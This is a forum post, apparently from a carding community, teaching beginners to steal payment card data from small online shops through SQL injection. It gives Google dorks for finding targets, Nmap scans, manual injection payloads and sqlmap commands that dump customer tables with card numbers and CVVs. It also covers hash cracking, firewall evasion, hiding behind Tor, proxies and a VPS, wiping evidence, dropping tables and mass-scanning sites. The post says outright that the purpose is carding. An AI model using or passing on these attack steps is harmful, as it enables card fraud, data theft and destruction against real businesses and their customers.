MotherRussia
Member
- Messages
- 10
- Reaction score
- 3
- Points
- 3
The following information will be very technical. The difficulty level is 10/10. If you want to actually learn and develop your brain, I advise you to study it. I have handwritten everything as clearly as possible. EVERYTHING Written below is BEGINNER FRIENDLY. Reading Step by step will help you understand everything.
SQL Injection:
SQL injection (SQLi) lets you manipulate a website’s database by sneaking malicious commands into input fields like logins or search bars. If the site’s code doesn’t check inputs properly, you can extract sensitive data think card numbers, names, and addresses. This guide starts with setting up your system and ends with pulling hundreds of records. It’s built for beginners but goes deep into the tech. Follow along.Step 1: Set Up Kali Linux
Kali Linux is a free operating system designed for hacking and security testing. It comes with tools like Nmap and sqlmap pre-installed, making it perfect for this. You’ll run it on a virtual machine (VM) or USB so your main computer stays safe.- Download Kali: Go to kali.org, click “Download”, and grab the “Kali Linux VMware” or “Live USB” image (about 3GB). The VMware version is easier for beginners. Pick the 64-bit option unless your computer’s ancient.
- Install VMware: Get VMware Workstation Player (free for personal use) from vmware.com. Install it by double-clicking the .exe (Windows) or .bundle (Linux), then follow the prompts click “Next” a bunch and accept the license.
- Set Up the VM: Open VMware Player, click “Open a Virtual Machine”, and select the Kali .vmx file you downloaded. It’s prebuilt, so hit “Play”. If it asks for a password, try “kali” (username: kali, password: kali). First boot takes 5 minutes.
- USB Option: If you prefer a USB, use Rufus (free, rufus.ie) on Windows. Plug in a 16GB+ USB, select the Kali ISO, and click “Start”. Boot your PC from the USB (press F12 or Del at startup, pick USB). Choose “Live” mode to test without installing.
- Update Kali: Open the terminal (black box icon) and update the system to get the latest tools.
sudo apt update
This grabs the latest package lists (takes 1-2 minutes with decent internet). Then:
sudo apt upgrade -y
This installs updates (might take 10-20 minutes). The -y flag says “yes” to all prompts. Restart with reboot if it asks. - Why Kali?: It’s got a Linux kernel (Debian-based), tons of preloaded hacking tools, and runs everything we need natively.
Step 2: Learn SQLi Basics in 2 Hours
SQL is the language databases use to store and fetch data. Web apps send SQL queries like SELECT * FROM users WHERE username = 'input' AND password = 'input' to check logins. SQLi tricks this by injecting bad input. You’ll learn how in 2 hours.- Watch Tutorials: Open Firefox (Kali’s default browser), go to YouTube, and search “SQL injection for beginners”. Try “HackerSploit SQL Injection” or “The Cyber Mentor SQLi”. These 20-40 minute videos show how queries work and how to break them. Key terms:
- Table: Like a spreadsheet (e.g., “customers”).
- Column: A field in the table (e.g., “card_number”).
- Query: A command to get data.
- What to Learn: Focus on “union-based” SQLi (adding your own query) and “error-based” SQLi (using errors to leak info). After 2 hours, you’ll know how to spot weak spots and test them manually.
Step 3: Recon with Nmap
Before attacking, scan sites to find vulnerable ones. Nmap (Network Mapper) is a tool in Kali that checks what a server’s running. It’s like knocking on doors to see who answers.- Install Nmap: It’s already in Kali, but confirm with nmap --version. You’ll see something like “Nmap 7.94”.
- Find Targets: Pick small e-commerce sites think local shops, not Amazon. Use Google: “site:*.com inurl: (login OR search) -inurl: (google OR facebook)”. Copy a URL like shop.example.com.
- Basic Scan: In the terminal, scan the site’s IP or domain.
nmap shop.example.com
This lists open ports (e.g., 80 for HTTP, 3306 for MySQL). If 3306 is open, the database might be exposed rare but a goldmine. Takes 10-60 seconds. - Deep Scan: Check for web server details.
nmap -sV -p 80 shop.example.com
-sV detects versions (e.g., Apache 2.4.41), -p 80 targets the web port. Look for old software (Apache < 2.4.50, PHP < 7.4)—these often have SQLi flaws. Takes 1-2 minutes. - Why Nmap?: It narrows your targets to sites likely running exploitable tech. Save good ones in a file: echo "shop.example.com" > targets.txt.
Step 4: Test Manually
Now, test a site for SQLi. Pick a URL with a parameter (e.g., shop.example.com/product?id=123) or a login form. You’ll inject a payload to see if the database freaks out.- Simple Payload: In the URL, change it to shop.example.com/product?id=123' OR 1=1 #. Hit Enter. Or in a login field, type ' OR 1=1 # for username and anything for password. Here’s why it works:
- Results: If the page loads all products, logs you in, or shows an error like “mysql_fetch_array() error”, it’s vulnerable. No change? Try a search bar with ' OR 1=1 #. Errors mean the database parsed your input wrong SQLi confirmed.
- Map Columns: Test shop.example.com/product?id=123' ORDER BY 1 #, then 2, 3, up to 10. If ORDER BY 5 works but 6 fails, the table has 5 columns. Errors like “unknown column” prove it.
- Union Test: Try shop.example.com/product?id=123' UNION SELECT 1,2,3,4,5 #. If “1 2 3 4 5” appears on the page, you can inject custom queries. Swap numbers for info: shop.example.com/product?id=123' UNION SELECT database(),user(),version(),4,5 #. This shows the database name (e.g., shop_db), user (e.g., root@localhost), and version (e.g., 5.7.36).
Step 5: Automate with sqlmap
sqlmap is a Python tool that does SQLi for you. It’s pre-installed in Kali, but let’s set it up right.- Check sqlmap: Confirm it’s there.
sqlmap --version
You’ll see “sqlmap/1.8” or similar. If missing, install it: sudo apt install sqlmap. - List Databases: For shop.example.com/product?id=123, run:
sqlmap -u "http://shop.example.com/product?id=123" --batch --dbs
--batch skips questions, --dbs lists databases. Output might show shop_db, information_schema, mysql. Takes 1-5 minutes depending on the server. - Get Tables: Focus on shop_db.
sqlmap -u "http://shop.example.com/product?id=123" -D shop_db --batch --tables
You’ll see customers, orders, products. Each table holds different data. - List Columns: Target customers.
sqlmap -u "http://shop.example.com/product?id=123" -D shop_db -T customers --batch --columns
Output: id (integer), name (varchar), card_number (varchar), address (text), cvv (integer). These are the fields inside. - Dump Data: Extract everything.
sqlmap -u "http://shop.example.com/product?id=123" -D shop_db -T customers --batch --dump
This pulls 500-2000 rows from a small store. Output looks like: id | name | card_number | address | cvv, then 1 | Alice Brown | 4111111111111111 | 789 Pine St | 123, 2 | Bob Jones | 5555555555554444 | 456 Elm Rd | 456. If card_number is 5f4dcc3b5aa765d61d8327deb882cf99, it’s MD5-hashed. Crack it with Hashcat (below) if it’s weak. Plaintext is your win. - Crack Hashes: Install Hashcat.
sudo apt install hashcat
Save the hash to hash.txt: echo "5f4dcc3b5aa765d61d8327deb882cf99" > hash.txt. Crack it:
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
-m 0 is MD5, -a 0 is wordlist attack, rockyou.txt is a common password list in Kali. If it’s “password”, you’ll see it in 1-10 minutes on a decent CPU.
Step 6: Optimize and Evade Detection
Make sqlmap faster and sneakier. Check if the site uses POST (e.g., login forms) instead of GET (URL parameters).- Capture POST: Open Firefox, go to the login page, press F12 for DevTools, click “Network”, log in with junk data (user: test, pass: test). Find the POST request, right-click, “Copy as cURL”. Paste it into a file.
nano request.txt
Edit it to look like: POST http://shop.example.com/login username=test&password=test. Save with Ctrl+O, Enter, Ctrl+X. - Run POST: Use the file.
sqlmap -r request.txt --batch --dbs
Same process as GET, just different input. - Speed Up: Add threads.
sqlmap -r request.txt --batch --dbs --threads 5
Five connections at once—faster but riskier. - Dodge WAFs: Web firewalls block obvious attacks.
sqlmap -r request.txt --batch --dbs --random-agent --tamper=space2comment
--random-agent fakes browser headers, --tamper=space2comment swaps spaces for /**/. Test other tampers: sqlmap --list-tampers. - Avoid Bans: Slow it down if rate-limited.
sqlmap -r request.txt --batch --dbs --delay 2
2-second gaps between requests. - Save Output: Store data cleanly.
sqlmap -r request.txt --batch --dbs --output-dir=/home/kali/dumps
Creates a SQLite file in /home/kali/dumps.
Step 7: Stay Under the Radar
Hide your tracks so no one traces you.- Use Tor: Route through Tor (pre-installed in Kali).
sqlmap -u "http://shop.example.com/product?id=123" --batch --dbs --tor --tor-type=SOCKS5
Takes longer (5-10 minutes per step) but anonymizes you. - Proxy: Use a public proxy (find on free-proxy-list.net).
sqlmap -u "http://shop.example.com/product?id=123" --batch --dbs --proxy="http://45.32.12.78:8080"
Swap the IP for a live one. Test it first: curl --proxy http://45.32.12.78:8080 http://ifconfig.me. - VPS: Rent from Contabo ($5/month), install OpenVPN.
sudo apt install openvpn
Download a config from vpngate.net, run: sudo openvpn --config client.ovpn. Then use sqlmap normally—traffic routes through the VPS. - Disposable VM: Boot Kali in “Live” mode or use Tails (tails.net) on another USB. No traces on your hard drive.
- Encrypt Data: Lock your dump.
gpg -c /home/kali/dumps/dump.sql
Enter a password (e.g., “supersecret123”). Upload to Proton Drive (5GB free) with Firefox, then wipe the VPS: sudo shred -u /home/kali/dumps/dump.sql. - Timing: Hit at 3 AM target time (check time zones on timeanddate.com). Logs reset, admins sleep.
Technical Edge
Push it further with these tricks.- Stacked Queries: If the database allows multiple commands (PostgreSQL yes, MySQL rarely), drop tables.
sqlmap -u "http://shop.example.com/product?id=123" --batch --sql-query="DROP TABLE users"
Wipes data as a bonus. - Interactive Shell: Get a SQL prompt.
sqlmap -u "http://shop.example.com/product?id=123" --batch --sql-shell
Type: SELECT * FROM customers WHERE id = 1. Instant results. - XSS Combo: If input reflects, chain XSS.
sqlmap -u "http://shop.example.com/product?id=123" --batch --test-filter="XSS"
Tests '"><script>alert(1)</script>. If it pops an alert, double trouble. - Mass Scan: Test 100 URLs from targets.txt (from Nmap).
sqlmap -m /home/kali/targets.txt --batch --dbs
One hit’s all you need.
If you skipped directly to the end because things are getting very complicated for you, I advise you to go back and read from the beginning. If you can't do these basic SQL exercises, you will never be able to card. This is the same as learning what BINs are and how to use cards, but this chapter will boost your confidence. If you have any more questions, make sure to ask. For those who have read this far, you can request an even more in-depth guide, and I will include it in the post within 24 hours.
Last edited by a moderator:
